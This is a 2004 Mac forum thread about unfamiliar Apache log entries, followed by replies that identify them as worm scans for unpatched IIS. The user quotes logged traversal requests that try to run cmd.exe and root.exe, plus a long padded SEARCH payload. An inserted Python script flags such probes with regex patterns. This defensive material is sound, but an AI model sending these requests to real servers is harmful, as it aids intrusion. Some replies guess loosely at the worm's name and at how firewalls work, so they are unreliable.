
walkingmac

macrumors 6502
Original poster
Mar 30, 2003
ok... so I take advantage of the fact that I have Apache ready to use on my nice Mac OS X PowerMac and host my own website.

I also like to know what is going on with my site and who is accessing what. So I have my access.log displayed on my desktop with *GeekTool*.

Every so often I get blips like this that also send my CPU screaming for a few minutes:
12.220.19.2 - - [05/Apr/2004:03:42:48 -0400] "SEARCH /\x90\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\ ...and on and on a couple of thousand times... x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\ ...like 10,000 more of these or so.... \x90\x90\x90" 414 363

Is this a flood or something else?

and I get these a lot:
12.220.22.9 - - [04/Apr/2004:23:13:32 -0400] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 302
12.220.22.9 - - [04/Apr/2004:23:13:32 -0400] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 300
12.220.22.9 - - [04/Apr/2004:23:13:32 -0400] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 310
12.220.22.9 - - [04/Apr/2004:23:13:32 -0400] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 310
12.220.22.9 - - [04/Apr/2004:23:13:32 -0400] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 324
12.220.22.9 - - [04/Apr/2004:23:13:32 -0400] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 341
12.220.22.9 - - [04/Apr/2004:23:13:32 -0400] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 341
12.220.22.9 - - [04/Apr/2004:23:13:33 -0400] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 357
12.220.22.9 - - [04/Apr/2004:23:13:33 -0400] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 323
12.220.22.9 - - [04/Apr/2004:23:13:33 -0400] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 323
12.220.22.9 - - [04/Apr/2004:23:13:33 -0400] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 323
12.220.22.9 - - [04/Apr/2004:23:13:33 -0400] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 323
12.220.22.9 - - [04/Apr/2004:23:13:33 -0400] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 307
12.220.22.9 - - [04/Apr/2004:23:13:33 -0400] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 307
12.220.22.9 - - [04/Apr/2004:23:13:34 -0400] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 324
12.220.22.9 - - [04/Apr/2004:23:13:34 -0400] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 324

I look up the IP address and it says this is somewhere in Lexington KY.
Any help?
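As an added example (it is not part of walkingmac's post and not anything from MacRumors), here is a small Python script that parses lines in the Apache common log format shown above and tallies, per source address, the requests that can only be aimed at IIS (root.exe, cmd.exe, the encoded `..%255c` and `..%c0%af` traversals) and the oversized requests that Apache refuses with a 414. The log lines embedded in it are constructed to match the shape of the ones quoted above; the thresholds, the label names and the `scanning_hosts` helper are my own assumptions, not anything from the thread.

```python
import re
from collections import Counter, defaultdict

# Apache "common" log format: host ident user [time] "request" status bytes
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<request>[^"]*)" (?P<status>\d{3}) (?P<size>\d+|-)$'
)

# Request substrings that only make sense against Microsoft IIS. On an
# Apache/OS X host they can never succeed, so they mark automated scanning.
IIS_PROBE_PATTERNS = [
    re.compile(r'/root\.exe', re.I),
    re.compile(r'/cmd\.exe', re.I),
    re.compile(r'/winnt/system32/', re.I),
    re.compile(r'\.\.%(?:25)?5c', re.I),            # (double-)encoded backslash traversal
    re.compile(r'\.\.%c[01]%[0-9a-f]{2}', re.I),     # overlong UTF-8 slash traversal
]

# Assumed threshold: no real URL on this site is anywhere near this long.
MAX_SANE_REQUEST = 2048

# Constructed sample in the same shape as the lines quoted in the post above
# (only a handful of the thousands of \x90 bytes are reproduced).
SAMPLE_LOG = r'''12.220.19.2 - - [05/Apr/2004:03:42:48 -0400] "SEARCH /\x90\x02\xb1\x02\xb1\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" 414 363
12.220.22.9 - - [04/Apr/2004:23:13:32 -0400] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 302
12.220.22.9 - - [04/Apr/2004:23:13:32 -0400] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 324
12.220.22.9 - - [04/Apr/2004:23:13:33 -0400] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 323
10.0.0.5 - - [05/Apr/2004:10:00:00 -0400] "GET /index.html HTTP/1.1" 200 1024
'''


def classify(line):
    """Return (host, label) for one log line, or None if it does not parse.

    Labels: 'iis-probe', 'oversized-request', 'normal'.
    """
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    req = m.group('request')
    if any(p.search(req) for p in IIS_PROBE_PATTERNS):
        return m.group('host'), 'iis-probe'
    # Apache answers 414 when the request line is too long; a request target
    # made of repeated escaped bytes is a canned payload, not a real URL.
    if (m.group('status') == '414'
            or len(req) > MAX_SANE_REQUEST
            or req.count('\\x90') > 8):
        return m.group('host'), 'oversized-request'
    return m.group('host'), 'normal'


def summarize(log_text):
    """Count request labels per source address; returns {host: Counter}."""
    per_host = defaultdict(Counter)
    for line in log_text.splitlines():
        result = classify(line)
        if result:
            host, label = result
            per_host[host][label] += 1
    return dict(per_host)


def scanning_hosts(summary, min_hits=3):
    """Sorted hosts whose count of non-normal requests reaches min_hits."""
    return sorted(
        host for host, counts in summary.items()
        if sum(n for label, n in counts.items() if label != 'normal') >= min_hits
    )


if __name__ == '__main__':
    summary = summarize(SAMPLE_LOG)
    for host, counts in sorted(summary.items()):
        print(host, dict(counts))
    print('repeat scanners:', scanning_hosts(summary))
```

Run it against a real file with `summarize(open('/var/log/httpd/access_log').read())`; the `iis-probe` count per address is the number to watch, since on an Apache box every one of those requests is a guaranteed 404 and the only cost is the CPU and bandwidth spent logging them.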
 
This person (or people) is looking for Internet Information Server (Microsoft's Webserver). It's easier to just bang away at any machine listening on port 80 than it is to determine the type of server first. You needn't worry about these sorts of attacks (even if you were running Apache on Windows rather than OS X).

I should amend my first sentence though. They're looking for unpatched IIS boxes, which also would include a lot of Windows desktop boxes since many configurations of NT and 2000 would enable IIS by default.
 
Westside guy said:
This person (or people) is looking for Internet Information Server (Microsoft's Webserver). It's easier to just bang away at any machine listening on port 80 than it is to determine the type of server first. You needn't worry about these sorts of attacks (even if you were running Apache on Windows rather than OS X).

I should amend my first sentence though. They're looking for unpatched IIS boxes, which also would include a lot of Windows desktop boxes since many configurations of NT and 2000 would enable IIS by default.

Actually that looks like the goofy worm that was out not too long ago. Nimda or CodeRed, I can't remember which did what. Most likely, the person doesn't know their machine is infected.
 
7on said:
Would turning on the firewall stop such attacks to affect CPU speed?

No because the firewall works on the port level (level 4) not level 5, so any port 80 request would be allowed through.
 
It's not that it bothers me that it is logged (I like the fact that I can see what's going on at least), rather that it is affecting my system's performance. I don't see the value in moving my port. Is it just that they are banging away at anything listening on 80 specifically, or is it through my website (which of course is on port 80)? How will moving my port to 81 affect my website? Would this then require something different from my current system of updating my IP address to the DNS? (sorry I don't know a whole lot about this stuff besides turning on and setting up services and making the websites :eek: )
 
Well, I only use Apache/MySQL on my PC atm for local testing - and for showing clients their work... so it's only accessed from outside the network when I give out a link - so I give out http://MY_IPADDRESS:81/client/index.php

Moving to port 81 would stop most of it, as they will be scanning all IPs on port 80 - which would be blocked by your firewall.

However, if you use your Mac as a server a lot, then moving to port 81 wouldn't be a good idea ;)
 
tomf87 said:
Actually that looks like the goofy worm that was out not too long ago. Nimda or CodeRed, I can't remember which did what. Most likely, the person doesn't know their machine is infected.

You're right; it's CodeRed. So it's a hacker once removed. :D

7on said:
Would turning on the firewall stop such attacks to affect CPU speed?

I wouldn't worry so much about the system impact; but unfortunately if there's enough traffic it can certainly bog down your internet connection. There's not a lot you personally can do about that; and if you ask your ISP to do something about it they'll probably say "you know, you're not supposed to be running any sort of server on our lines". :p
 